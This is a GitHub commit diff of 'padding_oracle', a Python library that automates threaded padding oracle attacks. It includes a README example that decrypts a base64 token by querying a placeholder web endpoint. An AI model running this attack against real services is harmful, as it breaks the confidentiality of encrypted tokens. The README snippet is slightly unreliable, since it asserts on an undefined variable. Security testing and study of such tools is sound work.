Skip to content

Commit 2807939

Browse files
committed
fix: all
1 parent cb3a066 commit 2807939

16 files changed

+523
-432
lines changed

.gitignore

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -4,3 +4,4 @@ build/
44
.DS_Store
55
*.pyc
66
*.egg-info
7+
.pytest_cache

Makefile

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
.PHONY: build upload
1+
.PHONY: build upload test
22

33
build:
44
python3 -m pip install --upgrade build
@@ -7,3 +7,7 @@ build:
77
upload:
88
python3 -m pip install --upgrade twine
99
python3 -m twine upload --repository pypi dist/*
10+
11+
test:
12+
python3 -m pip install --quiet pytest cryptography
13+
python3 -m pytest tests

README.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -33,13 +33,13 @@ Let's say we are going to test `https://the.target.site/api/?token=BASE64_ENCODE
3333

3434
```python
3535
from padding_oracle import padding_oracle, base64_encode, base64_decode
36-
import requests, string
36+
import requests
3737

38-
sess = requests.Session() # for connection pool
39-
url = 'https://the.target.site/api/'
38+
sess = requests.Session() # use connection pool
39+
url = 'https://example.com/api/'
4040

41-
def check_decrypt(cipher: bytes):
42-
resp = sess.get(url, params={'token': base64_encode(cipher)})
41+
def oracle(ciphertext: bytes):
42+
resp = sess.get(url, params={'token': base64_encode(ciphertext)})
4343

4444
if 'failed' in resp.text:
4545
return False
@@ -48,16 +48,16 @@ def check_decrypt(cipher: bytes):
4848
else:
4949
raise RuntimeError('unexpected behavior')
5050

51-
cipher = base64_decode('BASE64_ENCODED_TOKEN')
51+
ciphertext = base64_decode('BASE64_ENCODED_TOKEN')
5252
# becomes IV + block1 + block2 + ...
53+
5354
assert len(cipher) % 16 == 0
5455

5556
plaintext = padding_oracle(
56-
cipher, # cipher bytes
57+
ciphertext, # cipher bytes
5758
block_size = 16,
58-
oracle = check_decrypt,
59+
oracle = oracle,
5960
num_threads = 16,
60-
chars = string.printable # possible plaintext chars
6161
)
6262
```
6363

pyproject.toml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,13 +4,13 @@ build-backend = "hatchling.build"
44

55
[project]
66
name = "padding_oracle"
7-
version = "0.2.3"
7+
version = "0.3.0"
88
authors = [
99
{ name="Yuankui Li", email="[email protected]" },
1010
]
1111
description = "Threaded padding oracle automation."
1212
readme = "README.md"
13-
requires-python = ">=3.5"
13+
requires-python = ">=3.6"
1414
classifiers = [
1515
'Programming Language :: Python :: 3',
1616
'License :: OSI Approved :: MIT License',

src/padding_oracle/__init__.py

Lines changed: 6 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,10 @@
2020
SOFTWARE.
2121
'''
2222

23+
from .solve import solve, convert_to_bytes, remove_padding
24+
from .encoding import (
25+
urlencode, urldecode,
26+
base64_encode, base64_decode,
27+
to_bytes, to_str,
28+
)
2329
from .legacy import padding_oracle
24-
from .encoding import urlencode, urldecode, base64_encode, base64_decode, to_bytes, to_str
25-
from .solver import Solver, solve, plaintext_list_to_bytes, remove_padding
26-
from .logger import get_logger

src/padding_oracle/encoding.py

Lines changed: 11 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@
2222

2323
import base64
2424
import urllib.parse
25-
from typing import Union
25+
from typing import List, Union
2626

2727
__all__ = [
2828
'base64_encode', 'base64_decode',
@@ -31,14 +31,18 @@
3131
]
3232

3333

34-
def to_bytes(data: Union[str, bytes]):
34+
def to_bytes(data: Union[str, bytes, List[int]]) -> bytes:
3535
if isinstance(data, str):
3636
data = data.encode()
37+
elif isinstance(data, list):
38+
data = bytes(data)
3739
assert isinstance(data, bytes)
3840
return data
3941

4042

41-
def to_str(data):
43+
def to_str(data: Union[str, bytes, List[int]]) -> str:
44+
if isinstance(data, list):
45+
data = bytes(data)
4246
if isinstance(data, bytes):
4347
data = data.decode()
4448
elif isinstance(data, str):
@@ -48,21 +52,21 @@ def to_str(data):
4852
return data
4953

5054

51-
def base64_decode(data: Union[str, bytes]) -> bytes:
55+
def base64_decode(data: Union[str, bytes, List[int]]) -> bytes:
5256
data = to_bytes(data)
5357
return base64.b64decode(data)
5458

5559

56-
def base64_encode(data: Union[str, bytes]) -> str:
60+
def base64_encode(data: Union[str, bytes, List[int]]) -> str:
5761
data = to_bytes(data)
5862
return base64.b64encode(data).decode()
5963

6064

61-
def urlencode(data: Union[str, bytes]) -> str:
65+
def urlencode(data: Union[str, bytes, List[int]]) -> str:
6266
data = to_bytes(data)
6367
return urllib.parse.quote(data)
6468

6569

66-
def urldecode(data: str) -> bytes:
70+
def urldecode(data: Union[str, bytes, List[int]]) -> bytes:
6771
data = to_str(data)
6872
return urllib.parse.unquote_plus(data)

src/padding_oracle/legacy.py

Lines changed: 53 additions & 129 deletions
Original file line numberDiff line numberDiff line change
@@ -22,164 +22,88 @@
2222

2323
import logging
2424
import traceback
25-
from typing import Union, Callable
26-
from concurrent.futures import ThreadPoolExecutor
25+
from typing import Optional, Union
2726

2827
from .encoding import to_bytes
28+
from .solve import Fail, OracleFunc, ResultType, solve, remove_padding, convert_to_bytes
2929

3030
__all__ = [
3131
'padding_oracle',
32-
'remove_padding'
3332
]
3433

35-
36-
def remove_padding(data: Union[str, bytes]):
37-
'''
38-
Remove PKCS#7 padding bytes.
39-
40-
Args:
41-
data (str | bytes)
42-
43-
Returns:
44-
data with padding removed (bytes)
45-
'''
46-
data = to_bytes(data)
47-
return data[:-data[-1]]
48-
49-
50-
def _get_logger():
51-
logger = logging.getLogger('padding_oracle')
52-
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')
53-
handler = logging.StreamHandler()
54-
handler.setFormatter(formatter)
55-
logger.addHandler(handler)
56-
return logger
57-
58-
59-
def padding_oracle(cipher: bytes,
34+
def padding_oracle(ciphertext: Union[bytes, str],
6035
block_size: int,
61-
oracle: Callable[[bytes], bool],
36+
oracle: OracleFunc,
6237
num_threads: int = 1,
6338
log_level: int = logging.INFO,
64-
chars=None,
65-
null: bytes = b' ') -> bytes:
39+
null_byte: bytes = b' ',
40+
return_raw: bool = False,
41+
) -> bytes:
6642
'''
67-
Run padding oracle attack to decrypt cipher given a function to check wether the cipher
68-
can be decrypted successfully.
43+
Run padding oracle attack to decrypt ciphertext given a function to check wether the
44+
ciphertext can be decrypted successfully.
6945
7046
Args:
71-
cipher (bytes|str) the cipher you want to decrypt
72-
block_size (int) block size (the cipher length should be multiple of this)
73-
oracle (function) a function: oracle(cipher: bytes) -> bool
74-
num_threads (int) how many oracle functions will be run in parallel (default: 1)
75-
log_level (int) log level (default: logging.INFO)
76-
chars (bytes|str) possible characters in your plaintext, None for all
77-
null (bytes|str) the default byte when plaintext are not set (default: b' ')
47+
cipher (bytes|str) the cipher you want to decrypt
48+
block_size (int) block size (the cipher length should be multiple of this)
49+
oracle (function) a function: oracle(cipher: bytes) -> bool
50+
num_threads (int) how many oracle functions will be run in parallel (default: 1)
51+
log_level (int) log level (default: logging.INFO)
52+
null_byte (bytes|str) the default byte when plaintext are not set (default: None)
53+
return_raw (bool) do not convert plaintext into bytes and unpad (default: False)
7854
7955
Returns:
80-
plaintext (bytes) the decrypted plaintext
56+
plaintext (bytes|List[int]) the decrypted plaintext
8157
'''
8258

8359
# Check args
8460
assert callable(oracle), 'the oracle function should be callable'
85-
assert oracle.__code__.co_argcount == 1, 'expect oracle function with only 1 argument'
86-
assert isinstance(cipher, (bytes, str)), 'cipher should have type bytes'
61+
assert isinstance(ciphertext, (bytes, str)), 'cipher should have type bytes'
8762
assert isinstance(block_size, int), 'block_size should have type int'
88-
assert len(cipher) % block_size == 0, 'cipher length should be multiple of block size'
63+
assert len(ciphertext) % block_size == 0, 'cipher length should be multiple of block size'
8964
assert 1 <= num_threads <= 1000, 'num_threads should be in [1, 1000]'
90-
assert isinstance(null, (bytes, str)), 'expect null with type bytes or str'
91-
assert len(null) == 1, 'null byte should have length of 1'
92-
assert isinstance(chars, (bytes, str)) or chars is None, 'chars should be None or type bytes'
65+
assert isinstance(null_byte, (bytes, str)), 'expect null with type bytes or str'
66+
assert len(null_byte) == 1, 'null byte should have length of 1'
9367

94-
logger = _get_logger()
68+
logger = get_logger()
9569
logger.setLevel(log_level)
9670

97-
cipher = to_bytes(cipher)
98-
null = to_bytes(null)
71+
ciphertext = to_bytes(ciphertext)
72+
null_byte = to_bytes(null_byte)
9973

100-
if chars is None:
101-
chars = set(range(256))
102-
else:
103-
chars = set(to_bytes(chars))
104-
chars |= set(range(1, block_size + 1)) # include PCKS#7 padding bytes
105-
106-
# Wrapper to handle exception from the oracle function
107-
def _oracle_wrapper(i: int, j: int, cipher: bytes):
74+
# Wrapper to handle exceptions from the oracle function
75+
def wrapped_oracle(ciphertext: bytes):
10876
try:
109-
return oracle(cipher)
77+
return oracle(ciphertext)
11078
except Exception as e:
111-
logger.error('unhandled error at block[{}][{}]: {}'.format(i, j, e))
112-
logger.debug('error details at block[{}][{}]: {}'.format(i, j, traceback.format_exc()))
79+
logger.error('error calling oracle with {!r}'.format(ciphertext))
80+
logger.debug('error details: {}'.format(traceback.format_exc()))
11381
return False
11482

115-
# The plaintext bytes list to store the decrypted data
116-
plaintext = [null] * (len(cipher) - block_size)
117-
118-
# Update the decrypted plaintext list
119-
def _update_plaintext(i: int, c: bytes):
120-
plaintext[i] = c
121-
logger.info('plaintext: {}'.format(b''.join(plaintext)))
122-
123-
oracle_executor = ThreadPoolExecutor(max_workers=num_threads)
83+
def result_callback(result: ResultType):
84+
if isinstance(result, Fail):
85+
if result.is_critical:
86+
logger.critical(result.message)
87+
else:
88+
logger.error(result.message)
12489

125-
# Block decrypting task to be run in parallel
126-
def _block_decrypt_task(i, prev: bytes, block: bytes):
127-
logger.debug('task={} prev={} block={}'.format(i, prev, block))
128-
guess_list = list(prev)
90+
def plaintext_callback(plaintext: bytes):
91+
plaintext = convert_to_bytes(plaintext, null_byte)
92+
logger.info(f'plaintext: {plaintext}')
12993

130-
for j in range(1, block_size + 1):
131-
oracle_hits = []
132-
oracle_futures = {}
133-
134-
for c in chars:
135-
k = c ^ j ^ prev[-j]
136-
137-
if i == len(blocks) - 1 and j == 1 and k == prev[-j]:
138-
# skip the last padding byte if it is identical to the original cipher
139-
continue
140-
141-
test_list = guess_list.copy()
142-
test_list[-j] = k
143-
oracle_futures[k] = oracle_executor.submit(
144-
_oracle_wrapper, i, j, bytes(test_list) + block)
145-
146-
for k, future in oracle_futures.items():
147-
if future.result():
148-
oracle_hits.append(k)
149-
150-
logger.debug(
151-
'oracles at block[{}][{}] -> {}'.format(i, block_size - j, oracle_hits))
152-
153-
# Number of oracle hits should be 1, or we just ignore this block
154-
if len(oracle_hits) != 1:
155-
logfmt = 'at block[{}][{}]: expect only one hit, got {}. (skipped)'
156-
logger.error(logfmt.format(i, block_size-j, len(oracle_hits)))
157-
return
158-
159-
guess_list[-j] = oracle_hits[0]
160-
161-
p = guess_list[-j] ^ j ^ prev[-j]
162-
_update_plaintext(i * block_size - j, bytes([p]))
163-
164-
for n in range(j):
165-
guess_list[-n-1] ^= j ^ (j + 1)
166-
167-
blocks = []
168-
169-
for i in range(0, len(cipher), block_size):
170-
blocks.append(cipher[i:i + block_size])
171-
172-
logger.debug('blocks: {}'.format(blocks))
173-
174-
with ThreadPoolExecutor() as executor:
175-
futures = []
176-
for i in reversed(range(1, len(blocks))):
177-
prev = b''.join(blocks[:i])
178-
block = b''.join(blocks[i:i+1])
179-
futures.append(executor.submit(_block_decrypt_task, i, prev, block))
180-
for future in futures:
181-
future.result()
182-
183-
oracle_executor.shutdown()
94+
plaintext = solve(ciphertext, block_size, wrapped_oracle, num_threads,
95+
result_callback, plaintext_callback)
96+
97+
if not return_raw:
98+
plaintext = convert_to_bytes(plaintext, null_byte)
99+
plaintext = remove_padding(plaintext)
100+
101+
return plaintext
184102

185-
return b''.join(plaintext)
103+
def get_logger():
104+
logger = logging.getLogger('padding_oracle')
105+
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')
106+
handler = logging.StreamHandler()
107+
handler.setFormatter(formatter)
108+
logger.addHandler(handler)
109+
return logger

0 commit comments

Comments
 (0)